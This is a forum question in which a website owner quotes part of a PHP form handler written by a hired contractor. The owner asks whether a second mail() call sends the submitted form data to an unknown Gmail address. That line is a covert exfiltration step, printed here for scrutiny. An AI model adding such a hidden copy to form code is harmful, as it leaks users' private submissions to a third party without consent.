I hired someone to modify an online form for me so it could be accessed securely through https: link, information could be submitted and the submitted information would be emailed to me. After it was completed I went in and looked at the php file that was created and here is what part of the code contained.
is my secure form information being sent to someone else?
9
I hired someone to modify an online form for me so it could be accessed securely through https: link, information could be submitted and the submitted information would be emailed to me.
After it was completed I went in and looked at the php file that was created and here is what part of the code contained.
*I modified the email and domain names
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1" . "\r\n";
$headers .= "From: info@mysite.net <info@mysite.net>" . "\r\n";
mail($to1,$subject1,$mailcontent1,$headers);
mail("emailnotmine@gmail.com",$subject1,$mailcontent1,$headers);
Does the last line of code mean the information is being sent to the email address emailnotmine@gmail.com?
Ron
After it was completed I went in and looked at the php file that was created and here is what part of the code contained.
*I modified the email and domain names
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1" . "\r\n";
$headers .= "From: info@mysite.net <info@mysite.net>" . "\r\n";
mail($to1,$subject1,$mailcontent1,$headers);
mail("emailnotmine@gmail.com",$subject1,$mailcontent1,$headers);
Does the last line of code mean the information is being sent to the email address emailnotmine@gmail.com?
Ron
- aisdbuilder
- mojojuju
- Earnie Boyd
- [1] reply
- ronr
- AVIRA
- [1] reply
- ronr
- triad
- SteveJohnson
Next Topics on Trending Feed
-
9